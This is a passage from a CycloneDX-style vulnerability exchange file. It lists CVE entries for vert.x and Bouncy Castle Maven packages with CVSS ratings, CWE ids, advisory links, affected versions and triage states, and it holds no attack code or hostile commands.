          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        }
      ]
    },
    {
      "id": "CVE-2026-6860",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        770,
        295
      ],
      "description": "A TCP client can perform a TLS handshake and present the server name extension with a server name that is accepted by a server wildcard name, e.g. if the server is configured with a certificate accepting *.example.com, any xyz.example.com, where xyz is a valid name, can be used.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6860"
        },
        {
          "url": "https://github.com/eclipse-vertx/vert.x"
        },
        {
          "url": "https://github.com/eclipse-vertx/vert.x/pull/6102"
        },
        {
          "url": "https://github.com/eclipse-vertx/vert.x/security/advisories/GHSA-3g76-f9xq-8vp6"
        },
        {
          "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/381"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6860"
        }
      ],
      "published": "2026-05-06T10:16:26+00:00",
      "updated": "2026-05-12T13:42:01+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.vertx/vertx-core@4.5.24",
          "versions": [
            {
              "version": "4.5.24",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:maven/io.vertx/vertx-core@4.5.24"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0636",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "cwes": [
        90
      ],
      "description": "Improper neutralization of special elements used in an LDAP query ('LDAP injection') vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcprov on all (prov modules). This vulnerability is associated with program files LDAPStoreHelper.\n\nThis issue affects BC-JAVA: from 1.74 before 1.84.",
      "recommendation": "Upgrade org.bouncycastle:bcprov-jdk18on to version 1.84",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0636"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0636"
        },
        {
          "url": "https://github.com/bcgit/bc-java"
        },
        {
          "url": "https://github.com/bcgit/bc-java/commit/d20cdb8430e09224114fec0179a71859929fcbde"
        },
        {
          "url": "https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902026%E2%80%900636"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0636"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0636"
        }
      ],
      "published": "2026-04-15T10:16:38+00:00",
      "updated": "2026-04-17T15:38:09+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82",
          "versions": [
            {
              "version": "1.82",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5588",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        327
      ],
      "description": "Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcpkix on all (pkix modules), Legion of the Bouncy Castle Inc. BCPKIX-FIPS bcpkix on All (pkix modules), Legion of the Bouncy Castle Inc. BCPIX-LTS bcpkix on All (pkix modules).\n\n This vulnerability is associated with program files JcaContentVerifierProviderBuilder.Java, JcaContentVerfierProviderBuilder.Java.\n\n\n\nThis issue affects BC-JAVA: from 1.67 before 1.84; BCPKIX-FIPS: from 2.0.6 before 2.0.11, from 2.1.7 before 2.1.11; BCPIX-LTS: from 2.73.7 before 2.73.11.",
      "recommendation": "Upgrade org.bouncycastle:bcpkix-jdk18on to version 1.84",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5588"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5588"
        },
        {
          "url": "https://github.com/bcgit/bc-java"
        },
        {
          "url": "https://github.com/bcgit/bc-java/commit/656bae0dbd9b1521f840521ff786e78749fe3057"
        },
        {
          "url": "https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902026%E2%80%905588"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5588"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5588"
        }
      ],
      "published": "2026-04-15T10:16:49+00:00",
      "updated": "2026-05-08T06:16:10+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.bouncycastle/bcpkix-jdk18on@1.82",
          "versions": [
            {
              "version": "1.82",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#pkg:maven/org.bouncycastle/bcpkix-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#pkg:maven/org.bouncycastle/bcpkix-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.bouncycastle/bcpkix-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.bouncycastle/bcpkix-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.bouncycastle/bcpkix-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.bouncycastle/bcpkix-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.bouncycastle/bcpkix-jdk18on@1.82"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5598",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        385
      ],
      "description": "Covert timing channel vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA core on all (core modules). This vulnerability is associated with program files FrodoEngine.Java.\n\nThis issue affects BC-JAVA: from 1.71 before 1.84.",
      "recommendation": "Upgrade org.bouncycastle:bcprov-jdk18on to version 1.84",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5598"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5598"
        },
        {
          "url": "https://github.com/bcgit/bc-java"
        },
        {
          "url": "https://github.com/bcgit/bc-java/commit/8692e6b2b191fc4aafa32545c7a78bdb9bf110c5"
        },
        {
          "url": "https://github.com/bcgit/bc-java/commit/94abbd56413dfdac651fd878bc60253871ef5e87"
        },
        {
          "url": "https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902026%E2%80%905598"
        },
        {
          "url": "https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902026%E2%80%905998"
        },
        {
          "url": "https://github.com/bcgit/bc-java/wiki/CVE-2026-5598"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5598"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5598"
        }
      ],
      "published": "2026-04-15T10:16:49+00:00",
      "updated": "2026-04-21T16:16:20+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82",
          "versions": [
            {
              "version": "1.82",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.bouncycastle/bcprov-jdk18on@1.82"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    }
  ],
  "component": []
}